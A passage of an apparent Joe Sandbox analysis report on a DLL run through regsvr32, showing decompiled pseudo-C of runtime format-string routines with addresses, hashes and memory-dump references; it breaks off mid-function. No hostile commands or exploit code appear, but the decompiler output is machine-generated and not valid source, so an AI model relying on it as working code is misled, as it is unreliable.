                                                                      • Opcode Fuzzy Hash: 701aee2548d71c2e17488ac65e38fe59db4fa18e90fa17d8832f215bf91c0da3
                                                                      • Instruction Fuzzy Hash: 0DD1BB77604E48C3EBAA8F1980407AD37A1F708BD8F958216FE494B7E5DF24CA5AC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E00000001180020FCC(long long __rbx, long long __rcx, long long __rsi, long long __rbp, void* __r8, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				short _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t124;
                                                                      				void* _t127;
                                                                      				void* _t159;
                                                                      				void* _t166;
                                                                      				unsigned int _t167;
                                                                      				signed char _t168;
                                                                      				signed int _t179;
                                                                      				signed short _t191;
                                                                      				void* _t194;
                                                                      				void* _t198;
                                                                      				signed long long _t259;
                                                                      				long long _t277;
                                                                      				long long _t279;
                                                                      				long long _t280;
                                                                      				intOrPtr* _t282;
                                                                      				intOrPtr _t286;
                                                                      				intOrPtr* _t288;
                                                                      				void* _t292;
                                                                      				signed long long _t294;
                                                                      				intOrPtr _t297;
                                                                      				intOrPtr _t299;
                                                                      				void* _t301;
                                                                      				signed int* _t302;
                                                                      				long long _t305;
                                                                      				void* _t307;
                                                                      				signed long long _t308;
                                                                      				intOrPtr _t311;
                                                                      				signed long long _t318;
                                                                      				void* _t319;
                                                                      				intOrPtr* _t321;
                                                                      
                                                                      				_t305 = __rbp;
                                                                      				_t303 = __rsi;
                                                                      				_t279 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t308 = _t307 - 0x50;
                                                                      				_t259 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t259 ^ _t308;
                                                                      				_t124 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t277 = __rcx;
                                                                      				_t6 = _t301 - 0x20; // 0x58
                                                                      				_t191 = _t6;
                                                                      				_t7 = _t301 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t198 = _t124 - 0x64;
                                                                      				if (_t198 > 0) goto 0x80021082;
                                                                      				if (_t198 == 0) goto 0x800210f3;
                                                                      				if (_t124 == 0x41) goto 0x80021100;
                                                                      				if (_t124 == 0x43) goto 0x8002105f;
                                                                      				if (_t124 - 0x44 <= 0) goto 0x8002110b;
                                                                      				if (_t124 - 0x47 <= 0) goto 0x80021100;
                                                                      				if (_t124 == 0x53) goto 0x800210b5;
                                                                      				if (_t124 == _t191) goto 0x80021075;
                                                                      				if (_t124 == 0x5a) goto 0x8002106b;
                                                                      				if (_t124 == 0x61) goto 0x80021100;
                                                                      				if (_t124 != 0x63) goto 0x8002110b;
                                                                      				E00000001180021430(_t166, _t124 - 0x63, __rcx, __rcx, _t292, __rsi, __r8);
                                                                      				goto 0x80021105;
                                                                      				E000000011800214F4(_t166, __rcx, __rcx, _t303);
                                                                      				goto 0x80021105;
                                                                      				_t127 = E0000000118002713C(r12b, __rcx, __rcx, _t303, __rbp);
                                                                      				goto 0x80021105;
                                                                      				if (_t127 - 0x67 <= 0) goto 0x80021100;
                                                                      				if (_t127 == 0x69) goto 0x800210f3;
                                                                      				if (_t127 == 0x6e) goto 0x800210ec;
                                                                      				if (_t127 == 0x6f) goto 0x800210cc;
                                                                      				if (_t127 == 0x70) goto 0x800210bc;
                                                                      				if (_t127 == 0x73) goto 0x800210b5;
                                                                      				if (_t127 == 0x75) goto 0x800210f7;
                                                                      				if (_t127 != 0x78) goto 0x8002110b;
                                                                      				goto 0x80021078;
                                                                      				E00000001180021570(__rcx, __rcx, _t303);
                                                                      				goto 0x80021105;
                                                                      				 *((intOrPtr*)(_t279 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t279 + 0x34)) = 0xb;
                                                                      				goto 0x80021075;
                                                                      				_t167 =  *(_t279 + 0x28);
                                                                      				if ((r12b & _t167 >> 0x00000005) == 0) goto 0x800210e0;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t277 + 0x28) = _t167;
                                                                      				_t280 = _t277;
                                                                      				E00000001180027328(0, _t277, _t280, _t303, _t305);
                                                                      				goto 0x80021105;
                                                                      				E00000001180021938(_t277, _t280);
                                                                      				goto 0x80021105;
                                                                      				 *(_t280 + 0x28) =  *(_t280 + 0x28) | 0x00000010;
                                                                      				E00000001180027514(0, _t277, _t280, _t303, _t305);
                                                                      				goto 0x80021105;
                                                                      				if (E00000001180021680(0, 0x78, _t277, _t280, _t305) != 0) goto 0x80021112;
                                                                      				goto 0x800213fd;
                                                                      				if ( *((intOrPtr*)(_t277 + 0x38)) != bpl) goto 0x800213fa;
                                                                      				_t168 =  *(_t277 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r13d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x80021170;
                                                                      				if ((r12b & 0) == 0) goto 0x80021152;
                                                                      				_v68 = _t319 + 0xd;
                                                                      				goto 0x8002116d;
                                                                      				if ((r12b & _t168) == 0) goto 0x8002115e;
                                                                      				goto 0x8002114b;
                                                                      				if ((r12b & 0) == 0) goto 0x80021170;
                                                                      				_v68 = r13w;
                                                                      				_t294 = _t318;
                                                                      				r8d =  *(_t277 + 0x3a) & 0x0000ffff;
                                                                      				r10d = 0xffdf;
                                                                      				if ((r10w & (r8w & 0xffffffff) - _t191) != 0) goto 0x80021195;
                                                                      				r9b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x80021198;
                                                                      				r9b = bpl;
                                                                      				r15d = 0x30;
                                                                      				if (r9b != 0) goto 0x800211b2;
                                                                      				if (0 == 0) goto 0x800211d1;
                                                                      				 *((intOrPtr*)(_t308 + 0x34 + _t294 * 2)) = r15w;
                                                                      				if (r8w == _t191) goto 0x800211c5;
                                                                      				if (r8w != 0x41) goto 0x800211c8;
                                                                      				 *((short*)(_t308 + 0x36 + _t294 * 2)) = _t191 & 0x0000ffff;
                                                                      				_t194 =  *((intOrPtr*)(_t277 + 0x2c)) -  *(_t277 + 0x48);
                                                                      				if ((_t168 & 0x0000000c) != 0) goto 0x8002123e;
                                                                      				r9d = 0;
                                                                      				if (_t194 <= 0) goto 0x8002123e;
                                                                      				_t311 =  *((intOrPtr*)(_t277 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t311 + 0x10)) !=  *((intOrPtr*)(_t311 + 8))) goto 0x8002120b;
                                                                      				if ( *((intOrPtr*)(_t311 + 0x18)) == bpl) goto 0x80021203;
                                                                      				goto 0x80021206;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80021231;
                                                                      				 *(_t277 + 0x20) = _t280 + 1;
                                                                      				 *((intOrPtr*)(_t311 + 0x10)) =  *((intOrPtr*)(_t311 + 0x10)) + _t318;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x460)))))) = r13w;
                                                                      				 *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) + 2;
                                                                      				if ( *(_t277 + 0x20) == 0xffffffff) goto 0x8002123e;
                                                                      				r9d = r9d + r12d;
                                                                      				if (r9d - _t194 < 0) goto 0x800211e8;
                                                                      				_t302 = _t277 + 0x20;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(_t277 + 8));
                                                                      				_t321 = _t277 + 0x460;
                                                                      				_t282 = _t321;
                                                                      				E00000001180013B40(_t280 + 1, _t194, _t277, _t282, _t303, _t305, _t302);
                                                                      				if ((r12b & 0) == 0) goto 0x800212ca;
                                                                      				if ((r12b &  *(_t277 + 0x28) >> 0x00000002) != 0) goto 0x800212ca;
                                                                      				r8d = 0;
                                                                      				if (_t194 <= 0) goto 0x800212ca;
                                                                      				_t297 =  *_t321;
                                                                      				if ( *((intOrPtr*)(_t297 + 0x10)) !=  *((intOrPtr*)(_t297 + 8))) goto 0x800212a1;
                                                                      				if ( *((intOrPtr*)(_t297 + 0x18)) == bpl) goto 0x8002129a;
                                                                      				goto 0x8002129d;
                                                                      				 *_t302 =  *_t302 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800212bd;
                                                                      				_t77 = _t282 + 1; // 0x180005f99
                                                                      				 *_t302 = _t77;
                                                                      				 *((intOrPtr*)(_t297 + 0x10)) =  *((intOrPtr*)(_t297 + 0x10)) + _t318;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t321)))) = r15w;
                                                                      				 *((long long*)( *_t321)) =  *((long long*)( *_t321)) + 2;
                                                                      				if ( *_t302 == 0xffffffff) goto 0x800212ca;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t194 < 0) goto 0x80021283;
                                                                      				if ( *((intOrPtr*)(_t277 + 0x4c)) != bpl) goto 0x800213ac;
                                                                      				if ( *(_t277 + 0x48) <= 0) goto 0x800213ac;
                                                                      				_t320 =  *((intOrPtr*)(_t277 + 8));
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t277 + 8)) + 0x28)) != bpl) goto 0x800212f4;
                                                                      				E00000001180006E80( *_t321, _t277,  *((intOrPtr*)(_t277 + 8)), _t297, _t303);
                                                                      				r9d = 0;
                                                                      				if ( *(_t277 + 0x48) == 0) goto 0x80021371;
                                                                      				_v72 = r9w;
                                                                      				_t159 = E0000000118003E80C( *_t302, 0, _t277,  &_v72,  *((intOrPtr*)(_t277 + 0x40)), _t302, _t303, _t305,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x18)) + 8)),  *((intOrPtr*)(_t277 + 8)));
                                                                      				r9d = 0;
                                                                      				if (_t159 <= 0) goto 0x800213a6;
                                                                      				_t286 =  *_t321;
                                                                      				if ( *((intOrPtr*)(_t286 + 0x10)) !=  *((intOrPtr*)(_t286 + 8))) goto 0x8002134c;
                                                                      				if ( *((intOrPtr*)(_t286 + 0x18)) == r9b) goto 0x80021346;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
                                                                      				goto 0x80021364;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
                                                                      				goto 0x80021364;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
                                                                      				 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)(_t286 + 0x10)) + _t318;
                                                                      				 *((short*)( *((intOrPtr*)( *_t321)))) = _v72 & 0x0000ffff;
                                                                      				 *((long long*)( *_t321)) =  *((long long*)( *_t321)) + 2;
                                                                      				if (0 + r12d !=  *(_t277 + 0x48)) goto 0x800212ff;
                                                                      				r13d = 0x20;
                                                                      				_t179 =  *_t302;
                                                                      				if (_t179 < 0) goto 0x800213fa;
                                                                      				if ((r12b & 0) == 0) goto 0x800213fa;
                                                                      				r8d = 0;
                                                                      				if (_t194 <= 0) goto 0x800213fa;
                                                                      				_t299 =  *_t321;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x10)) !=  *((intOrPtr*)(_t299 + 8))) goto 0x800213d1;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x18)) == bpl) goto 0x800213ca;
                                                                      				goto 0x800213cd;
                                                                      				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
                                                                      				goto 0x8002136f;
                                                                      				r8d =  *(_t277 + 0x48);
                                                                      				_t288 = _t321;
                                                                      				_v88 =  *((intOrPtr*)(_t277 + 8));
                                                                      				E00000001180013B40( *(_t277 + 0x28) >> 2, _t194, _t277, _t288, _t303, _t305, _t302);
                                                                      				goto 0x80021377;
                                                                      				 *_t302 = _t179 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800213ed;
                                                                      				 *_t302 = _t288 + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) + _t318;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t321)))) = r13w;
                                                                      				 *((long long*)( *_t321)) =  *((long long*)( *_t321)) + 2;
                                                                      				if ( *_t302 == 0xffffffff) goto 0x800213fa;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t194 < 0) goto 0x8002138f;
                                                                      				return E00000001180002FB0(r12b,  *_t302, _v56 ^ _t308);
                                                                      			}








































                                                                      0x180020fcc
                                                                      0x180020fcc
                                                                      0x180020fcc
                                                                      0x180020fcc
                                                                      0x180020fd1
                                                                      0x180020fd6
                                                                      0x180020fe4
                                                                      0x180020fe8
                                                                      0x180020ff2
                                                                      0x180020ff7
                                                                      0x180021000
                                                                      0x180021003
                                                                      0x180021003
                                                                      0x180021006
                                                                      0x180021006
                                                                      0x18002100a
                                                                      0x18002100e
                                                                      0x180021010
                                                                      0x18002101a
                                                                      0x180021024
                                                                      0x18002102a
                                                                      0x180021034
                                                                      0x18002103e
                                                                      0x180021043
                                                                      0x180021049
                                                                      0x18002104f
                                                                      0x180021059
                                                                      0x180021061
                                                                      0x180021066
                                                                      0x18002106b
                                                                      0x180021070
                                                                      0x180021078
                                                                      0x18002107d
                                                                      0x180021086
                                                                      0x18002108c
                                                                      0x180021092
                                                                      0x180021098
                                                                      0x18002109e
                                                                      0x1800210a4
                                                                      0x1800210aa
                                                                      0x1800210af
                                                                      0x1800210b3
                                                                      0x1800210b5
                                                                      0x1800210ba
                                                                      0x1800210bc
                                                                      0x1800210c3
                                                                      0x1800210ca
                                                                      0x1800210cc
                                                                      0x1800210d7
                                                                      0x1800210d9
                                                                      0x1800210dd
                                                                      0x1800210e2
                                                                      0x1800210e5
                                                                      0x1800210ea
                                                                      0x1800210ec
                                                                      0x1800210f1
                                                                      0x1800210f3
                                                                      0x1800210f9
                                                                      0x1800210fe
                                                                      0x180021109
                                                                      0x18002110d
                                                                      0x180021116
                                                                      0x18002111c
                                                                      0x180021121
                                                                      0x180021128
                                                                      0x18002112d
                                                                      0x18002113b
                                                                      0x180021145
                                                                      0x18002114b
                                                                      0x180021150
                                                                      0x180021155
                                                                      0x18002115c
                                                                      0x180021165
                                                                      0x180021167
                                                                      0x18002116d
                                                                      0x180021170
                                                                      0x180021175
                                                                      0x180021186
                                                                      0x18002118a
                                                                      0x180021193
                                                                      0x180021195
                                                                      0x18002119c
                                                                      0x1800211ac
                                                                      0x1800211b0
                                                                      0x1800211b2
                                                                      0x1800211bc
                                                                      0x1800211c3
                                                                      0x1800211c8
                                                                      0x1800211d6
                                                                      0x1800211dc
                                                                      0x1800211de
                                                                      0x1800211e3
                                                                      0x1800211e8
                                                                      0x1800211f7
                                                                      0x1800211fd
                                                                      0x180021201
                                                                      0x180021206
                                                                      0x180021209
                                                                      0x18002120e
                                                                      0x180021211
                                                                      0x18002121f
                                                                      0x18002122a
                                                                      0x180021234
                                                                      0x180021236
                                                                      0x18002123c
                                                                      0x180021242
                                                                      0x180021246
                                                                      0x180021249
                                                                      0x18002124e
                                                                      0x180021258
                                                                      0x180021260
                                                                      0x180021270
                                                                      0x180021278
                                                                      0x18002127a
                                                                      0x18002127f
                                                                      0x180021283
                                                                      0x18002128e
                                                                      0x180021294
                                                                      0x180021298
                                                                      0x18002129d
                                                                      0x18002129f
                                                                      0x1800212a1
                                                                      0x1800212a4
                                                                      0x1800212a6
                                                                      0x1800212b0
                                                                      0x1800212b7
                                                                      0x1800212c0
                                                                      0x1800212c2
                                                                      0x1800212c8
                                                                      0x1800212ce
                                                                      0x1800212d9
                                                                      0x1800212df
                                                                      0x1800212e7
                                                                      0x1800212ec
                                                                      0x1800212f8
                                                                      0x1800212fd
                                                                      0x180021308
                                                                      0x180021319
                                                                      0x18002131e
                                                                      0x180021326
                                                                      0x180021328
                                                                      0x180021338
                                                                      0x18002133e
                                                                      0x180021340
                                                                      0x180021344
                                                                      0x180021346
                                                                      0x18002134a
                                                                      0x18002134c
                                                                      0x180021350
                                                                      0x18002135a
                                                                      0x180021360
                                                                      0x18002136d
                                                                      0x180021371
                                                                      0x180021377
                                                                      0x18002137b
                                                                      0x180021386
                                                                      0x180021388
                                                                      0x18002138d
                                                                      0x18002138f
                                                                      0x18002139a
                                                                      0x1800213a0
                                                                      0x1800213a4
                                                                      0x1800213a6
                                                                      0x1800213aa
                                                                      0x1800213b3
                                                                      0x1800213b7
                                                                      0x1800213be
                                                                      0x1800213c3
                                                                      0x1800213c8
                                                                      0x1800213cd
                                                                      0x1800213cf
                                                                      0x1800213d4
                                                                      0x1800213d6
                                                                      0x1800213e0
                                                                      0x1800213e7
                                                                      0x1800213f0
                                                                      0x1800213f2
                                                                      0x1800213f8
                                                                      0x180021427

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42f2dce7f6f6dec0e1b27be66d5c0fab084cdfe63594bbe49a90d84c553e04c3
                                                                      • Instruction ID: 0bf69dc0d897b7a3aeb7c2cc35aa3ce064adb6a1cf86cd8aefb5e4ce92b52253
                                                                      • Opcode Fuzzy Hash: 42f2dce7f6f6dec0e1b27be66d5c0fab084cdfe63594bbe49a90d84c553e04c3
                                                                      • Instruction Fuzzy Hash: 6BD19A366006488AEBABCF1980407ED37A1F76CBC6F548216EF5947694DF35CAAAC344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0000000118003F5E4(void* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                      				void* _t12;
                                                                      				signed long long _t15;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      				signed long long _t27;
                                                                      
                                                                      				_t25 = _t26 - 0x168;
                                                                      				_t27 = _t26 - 0x268;
                                                                      				_t15 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t25 + 0x150) = _t15 ^ _t27;
                                                                      				r15d = 0;
                                                                      				 *((long long*)(_t27 + 0x70)) = __r8;
                                                                      				 *((long long*)(_t27 + 0x78)) = __rdx;
                                                                      				 *((long long*)(_t27 + 0x30)) =  *((intOrPtr*)(_t25 + 0x1d0));
                                                                      				 *((long long*)(_t27 + 0x68)) =  *((intOrPtr*)(_t25 + 0x1d8));
                                                                      				if (__rcx != 0) goto 0x8003f66c;
                                                                      				return E00000001180002FB0(0, _t12,  *(_t25 + 0x150) ^ _t27);
                                                                      			}








                                                                      0x18003f5f1
                                                                      0x18003f5f9
                                                                      0x18003f600
                                                                      0x18003f60a
                                                                      0x18003f618
                                                                      0x18003f625
                                                                      0x18003f62d
                                                                      0x18003f635
                                                                      0x18003f63d
                                                                      0x18003f645
                                                                      0x18003f66b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4023145424-0
                                                                      • Opcode ID: 541a0b3342f8d0b71217f831f9eee51201b0ce56bb728af166dad28a66c832cb
                                                                      • Instruction ID: 55fdc07715d16670c410184b9e9a285c6097a5a63bdf708dba56397e448322b0
                                                                      • Opcode Fuzzy Hash: 541a0b3342f8d0b71217f831f9eee51201b0ce56bb728af166dad28a66c832cb
                                                                      • Instruction Fuzzy Hash: ADD1C476204B8885EBB39B6299107FB67A0F798BC8F51C122FE8987795DF35C649C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E00000001180016828(void* __edi, long long __rbx, long long __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t110;
                                                                      				void* _t113;
                                                                      				void* _t142;
                                                                      				unsigned int _t149;
                                                                      				signed char _t150;
                                                                      				unsigned int _t155;
                                                                      				signed int _t161;
                                                                      				void* _t171;
                                                                      				void* _t172;
                                                                      				void* _t175;
                                                                      				void* _t176;
                                                                      				signed long long _t236;
                                                                      				long long _t252;
                                                                      				intOrPtr* _t257;
                                                                      				intOrPtr* _t261;
                                                                      				void* _t265;
                                                                      				intOrPtr _t268;
                                                                      				intOrPtr _t272;
                                                                      				signed int* _t274;
                                                                      				void* _t278;
                                                                      				void* _t279;
                                                                      				intOrPtr _t282;
                                                                      				void* _t289;
                                                                      				intOrPtr* _t290;
                                                                      
                                                                      				_t276 = __rsi;
                                                                      				_t273 = __rdi;
                                                                      				_t171 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t278 = _t279;
                                                                      				_t236 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t236 ^ _t279 - 0x00000050;
                                                                      				_t110 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t252 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				sil = 0x58;
                                                                      				r14b = 0x41;
                                                                      				_t176 = _t110 - 0x64;
                                                                      				if (_t176 > 0) goto 0x800168cb;
                                                                      				if (_t176 == 0) goto 0x8001692e;
                                                                      				if (_t110 == r14b) goto 0x8001693b;
                                                                      				if (_t110 == 0x43) goto 0x800168ae;
                                                                      				if (_t110 - 0x44 <= 0) goto 0x80016944;
                                                                      				if (_t110 - 0x47 <= 0) goto 0x8001693b;
                                                                      				if (_t110 == 0x53) goto 0x800168f0;
                                                                      				if (_t110 == sil) goto 0x800168c1;
                                                                      				if (_t110 == 0x5a) goto 0x800168ba;
                                                                      				if (_t110 == 0x61) goto 0x8001693b;
                                                                      				if (_t110 != 0x63) goto 0x80016944;
                                                                      				E00000001180016C14(_t110, _t110 - 0x63, __rcx, __rcx);
                                                                      				goto 0x80016940;
                                                                      				E00000001180016D20(__rcx);
                                                                      				goto 0x80016940;
                                                                      				_t113 = E0000000118001A6EC(r13b, _t172, __rcx, __rcx, __rdi, __rsi);
                                                                      				goto 0x80016940;
                                                                      				if (_t113 - 0x67 <= 0) goto 0x8001693b;
                                                                      				if (_t113 == 0x69) goto 0x8001692e;
                                                                      				if (_t113 == 0x6e) goto 0x80016927;
                                                                      				if (_t113 == 0x6f) goto 0x80016907;
                                                                      				if (_t113 == 0x70) goto 0x800168f7;
                                                                      				if (_t113 == 0x73) goto 0x800168f0;
                                                                      				if (_t113 == 0x75) goto 0x80016932;
                                                                      				if (_t113 != dil) goto 0x80016944;
                                                                      				goto 0x800168c4;
                                                                      				E00000001180016DC8(__rcx, __rcx);
                                                                      				goto 0x80016940;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x800168c1;
                                                                      				_t149 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t149 >> 0x00000005) == 0) goto 0x8001691b;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t149;
                                                                      				E0000000118001A918(0, _t172, __rcx, __rcx, _t273, _t276);
                                                                      				goto 0x80016940;
                                                                      				E00000001180017160(__rcx);
                                                                      				goto 0x80016940;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001AB44(0, _t172, __rcx, __rcx, _t273, _t276);
                                                                      				goto 0x80016940;
                                                                      				if (E00000001180016E8C(0, r13b & _t149 >> 0x00000005, __rcx, __rcx, _t276, _t278) != 0) goto 0x8001694b;
                                                                      				goto 0x80016be0;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x80016961;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x470)) == r13d) goto 0x80016bdd;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x80016bdd;
                                                                      				_t150 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x800169ae;
                                                                      				if ((r13b & 0) == 0) goto 0x80016993;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x800169ab;
                                                                      				if ((r13b & _t150) == 0) goto 0x8001699e;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x800169ab;
                                                                      				if ((r13b & 0) == 0) goto 0x800169ae;
                                                                      				_v72 = 0x20;
                                                                      				_t265 = _t289;
                                                                      				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((r8b - sil & 0x000000df) != 0) goto 0x800169cb;
                                                                      				if ((r13b & _t150 >> 0x00000005) == 0) goto 0x800169cb;
                                                                      				r9b = r13b;
                                                                      				goto 0x800169ce;
                                                                      				r9b = 0;
                                                                      				if (r9b != 0) goto 0x800169e2;
                                                                      				if ((r8b - r14b & 0xffffff00 | (r8b - r14b & 0x000000df) == 0x00000000) == 0) goto 0x800169fd;
                                                                      				 *((char*)(_t278 + _t265 - 0x20)) = 0x30;
                                                                      				if (r8b == sil) goto 0x800169f1;
                                                                      				if (r8b != r14b) goto 0x800169f4;
                                                                      				dil = sil;
                                                                      				 *((intOrPtr*)(_t278 + _t265 - 0x1f)) = dil;
                                                                      				_t175 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				if ((_t150 & 0x0000000c) != 0) goto 0x80016a69;
                                                                      				r9d = 0;
                                                                      				if (_t175 <= 0) goto 0x80016a69;
                                                                      				_t282 =  *((intOrPtr*)(__rcx + 0x460));
                                                                      				if ( *((intOrPtr*)(_t282 + 0x10)) !=  *((intOrPtr*)(_t282 + 8))) goto 0x80016a38;
                                                                      				if ( *((char*)(_t282 + 0x18)) == 0) goto 0x80016a30;
                                                                      				goto 0x80016a33;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80016a5c;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				 *((intOrPtr*)(_t282 + 0x10)) =  *((intOrPtr*)(_t282 + 0x10)) + _t289;
                                                                      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t289;
                                                                      				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x80016a69;
                                                                      				r9d = r9d + r13d;
                                                                      				if (r9d - _t175 < 0) goto 0x80016a14;
                                                                      				_t62 = _t252 + 0x20; // 0x98
                                                                      				_t274 = _t62;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t64 = _t252 + 0x460; // 0x4d8
                                                                      				_t290 = _t64;
                                                                      				_t257 = _t290;
                                                                      				E00000001180012494(__rcx + 1, _t171, _t175, __rcx, _t257, _t274, _t276, _t278, _t274);
                                                                      				_t155 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t155 >> 0x00000003) == 0) goto 0x80016af2;
                                                                      				if ((r13b & _t155 >> 0x00000002) != 0) goto 0x80016af2;
                                                                      				r8d = 0;
                                                                      				if (_t175 <= 0) goto 0x80016af2;
                                                                      				_t268 =  *_t290;
                                                                      				if ( *((intOrPtr*)(_t268 + 0x10)) !=  *((intOrPtr*)(_t268 + 8))) goto 0x80016acb;
                                                                      				if ( *((char*)(_t268 + 0x18)) == 0) goto 0x80016ac4;
                                                                      				goto 0x80016ac7;
                                                                      				 *_t274 =  *_t274 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80016ae5;
                                                                      				 *_t274 = _t257 + 1;
